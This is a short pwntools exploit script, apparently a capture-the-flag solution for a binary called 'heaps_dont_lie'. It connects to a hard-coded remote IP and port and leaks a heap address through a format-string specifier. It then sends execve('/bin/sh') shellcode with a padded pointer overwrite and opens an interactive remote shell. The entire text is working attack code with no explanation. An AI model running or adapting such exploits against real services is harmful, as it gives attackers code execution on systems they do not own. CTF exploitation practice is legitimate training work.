#!/usr/bin/python3

from pwn import *
import time

context.binary = target = ELF("./heaps_dont_lie", checksec=False)
# r = process()
r = remote("94.72.112.248", 1244)

# funcs
s = lambda a: r.sendline(a)
ss = lambda a: r.send(a)

# leak
buf = b"%7$p"
s(buf)
r.recvuntil(b"tune : ")
heap = int(r.recvline().strip(), 16) + 0x850
log.info("heap: %#x", heap)

# sc
sc = """
lea rdi, [rdx+19]
xor rsi, rsi
xor rdx, rdx
mov rax, 59
syscall
"""
sc = asm(sc) + b"/bin/sh\0"
sc += b"A"*(32-len(sc))
sc += p64(heap)
s(sc)

r.interactive()